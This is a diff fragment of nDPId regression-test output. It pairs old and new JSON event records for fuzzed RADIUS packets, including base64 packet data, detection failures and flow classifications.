00728{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997777144,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwBTlWAPwRTkLG4hk1CgxAHgcUchABHFtlAnUBFPy\/77suJLORzOzxdqID6lIaCwAAV8gbBVNQQxpuAAABNxA0sgGX0jUZ0GkvrTEvR6JJSI5kjTryeLE5ZDtRZpqfIB5gVwEzf0GZAiOA3v7qRShWEqoRNMrrQ0Ld9EZkDOPTXqYYz\/U0I\/SC+HAlACKylcNORMjkiI8OEYrbS\/uvrFsRUJm7gb3AATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0dyUAay5vcmcsIDViMjJhNzhjL2aqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00714{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997777144,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwBTlWAPwRTkLG4hk1CgxAHgcUchABHFtlAnUBFPy\/77suJLORzOzxdqID6lIaCwAAV8gbBVNQQxpuAAABNxA0sgGX0jUZ0GkvrTEvR6JJSI5kjTryeLE5ZDtRZpqfIB5gVwEzf0GZAiOA3v7qRShWEqoRNMrrQ0Ld9EZkDOPTXqYYz\/U0I\/SC+HAlACKylcNORMjkiI8OEYrbS\/uvrFsRUJm7gb3AATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0dyUAay5vcmcsIDViMjJhNzhjL2aqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997777328} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":214,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997777328}
00576{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997778376,"pkt":"ABRP+4rqcNuYVcUnCABVAADABUNAAPwRTqjG4hk1CgxAHgcUchAArF9UA3cApCAevq4tL8m2+S5T0IZH68wBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEqtx8kLAbqN4aRfnk10cKJs="} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528997778376,"pkt":"ABRP+4rqcNuYVcUnCABVAADABUNAAPwRTqjG4hk1CgxAHgcUchAArF9UA3cApCAevq4tL8m2+S5T0IZH68wBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwEiIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8HBAEABwBQEqtx8kLAbqN4aRfnk10cKJs="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997778442} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":218,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997778442}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":219,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997778376,"pkt":"hQAMB6xAchRP+4rqCABFAALbISpAbP8RAAAKDEAewuIZOHIQBxQCxwAAAXgCv4kwEW0JCeMao3TRk2O0OJUaCgAAV2QOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqeUATUwMzExNDgwMDczNjM4MDclAHdsYW4ubW5jNE8wLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZEwtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjAAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzg4Y2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgABAAIMBgAABRQ9BgAAACUABgAAAA1BBgAAAAZRBDU2TzoCAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":219,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997778376,"pkt":"hQAMB6xAchRP+4rqCABFAALbISpAbP8RAAAKDEAewuIZOHIQBxQCxwAAAXgCv4kwEW0JCeMao3TRk2O0OJUaCgAAV2QOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqeUATUwMzExNDgwMDczNjM4MDclAHdsYW4ubW5jNE8wLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZEwtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjAAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzg4Y2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgABAAIMBgAABRQ9BgAAACUABgAAAA1BBgAAAAZRBDU2TzoCAaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":219,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997780932} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":219,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528997780932}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":221,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997781139,"pkt":"AAAMB6xAABRPU4rqCAAXAALHIStAAP8RAAAKDEAexuIZNXIQBxQCswAAAXkCq1Vl1UpA6lxXEhEbxa4HRw8aCgAAV8gOBFVTmgwAAFfIDQZ3oGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqeVATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZjEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzAgYAAAAIGjEAAAAJASthdWRpdC1zZXMlAG9uLWlkPTFlZmYxMGFjMDAwMDAwYzg4Y2E3MjI1YiwgNWIyMmE3OGMlADA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAABKHBPmGtNtIJzGpfhqB3eGdAIAIFrsFJ8aFAAAV8gHDlZaV0MyVGVzdExhYlUKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaJQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADgh8hc0sS44MDQ4ODJOLTc0LjEwMjgzqlcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAI4NQAAOCEWJFN0YWRpdW1EaXJlY3QaDAAABYMHBtxQSplQEsG70Fu7iBnc6ge0pZ5Q5mQ="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":221,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997781139,"pkt":"AAAMB6xAABRPU4rqCAAXAALHIStAAP8RAAAKDEAexuIZNXIQBxQCswAAAXkCq1Vl1UpA6lxXEhEbxa4HRw8aCgAAV8gOBFVTmgwAAFfIDQZ3oGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqeVATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZjEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzAgYAAAAIGjEAAAAJASthdWRpdC1zZXMlAG9uLWlkPTFlZmYxMGFjMDAwMDAwYzg4Y2E3MjI1YiwgNWIyMmE3OGMlADA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAABKHBPmGtNtIJzGpfhqB3eGdAIAIFrsFJ8aFAAAV8gHDlZaV0MyVGVzdExhYlUKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaJQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADgh8hc0sS44MDQ4ODJOLTc0LjEwMjgzqlcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAI4NQAAOCEWJFN0YWRpdW1EaXJlY3QaDAAABYMHBtxQSplQEsG70Fu7iBnc6ge0pZ5Q5mQ="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":221,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997781425} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":221,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997781425}
01296{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997781611,"pkt":"AAAMB6xAABRP+4rqCADLAALbISxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAXoCv21LVaoOFlJlDTVaO4Jse+QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqfCCTUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jrzgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLXkwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWl2PTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMvxlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAA8yESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDhvMk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IR0GAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASlj6j0uJ92nAXwxDVWGMfUg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997781611,"pkt":"AAAMB6xAABRP+4rqCADLAALbISxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAXoCv21LVaoOFlJlDTVaO4Jse+QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqfCCTUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jrzgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLXkwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWl2PTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMvxlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAA8yESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDhvMk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IR0GAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASlj6j0uJ92nAXwxDVWGMfUg=="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997826378} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":223,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997826378}
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1528997829855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997829855,"pkt":"AAAMB6xAABRd+4rqCABFAALbIS5AAP8RAAAKDEAlAOIZNXIQBxQCxwAAAXwCv4IsSQM3nR8wY02\/WtSNjVsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAF\/ICQlXSVNQUjEwOgkAADghDQMyNwZbIqfFATVRMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vc2dZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzZG9uLWlkPTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgC7AAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLkVyZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFahoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgYzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWUgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMeQA4IRQGAAABAhoMAAA4IRUzAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASDRiCmnK8XecKtcjM1khyyg=="} 01393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1528997829855,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997829855,"pkt":"AAAMB6xAABRd+4rqCABFAALbIS5AAP8RAAAKDEAlAOIZNXIQBxQCxwAAAXwCv4IsSQM3nR8wY02\/WtSNjVsaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAF\/ICQlXSVNQUjEwOgkAADghDQMyNwZbIqfFATVRMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vc2dZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzZG9uLWlkPTEwZmYxMGFjMDAwMDAwYzljMmE3MjI1YiwgNWIyMmE3YzIvZTA6NWY6NDU6OTA6MDk6NWYvMjMyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgC7AAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLkVyZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFahoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgYzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWUgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMeQA4IRQGAAABAhoMAAA4IRUzAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASDRiCmnK8XecKtcjM1khyyg=="}
00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997829855,"flow_last_seen":1528997829855,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997829855,"l3_proto":"ip4","src_ip":"10.12.64.37","dst_ip":"0.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -283,15 +283,15 @@
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":235,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997833703,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 